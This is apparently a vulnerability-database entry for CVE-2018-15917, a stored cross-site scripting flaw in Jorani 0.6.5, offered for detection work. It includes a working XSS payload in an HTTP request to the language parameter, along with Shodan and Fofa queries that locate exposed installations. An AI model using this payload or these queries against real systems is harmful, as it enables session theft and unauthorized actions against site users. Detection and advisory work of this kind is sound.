🔙 목록으로 돌아가기

CVE-2018-15917: Jorani Leave Management System 0.6.5 - Cross-Site Scripting

TitleJorani Leave Management System 0.6.5 - Cross-Site Scripting
Authorritikchaddha
SeverityMedium
ImpactAuthenticated attackers can inject persistent malicious JavaScript through the language parameter that executes in other users' browsers including administrators, potentially stealing session cookies, credentials, or performing unauthorized actions in Jorani leave management system.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score5.4
EPSS Score0.00609
CVE IDCVE-2018-15917
CWE IDCWE-79
Shodan Querytitle:"Login - Jorani"http.favicon.hash:-2032163853
Fofa Queryicon_hash=-2032163853
Tags cve cve2018 jorani xss jorani_project vuln

🔍 Vulnerability Description

Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.

🌐 HTTP Request

GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /session/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-15917.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-15917.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A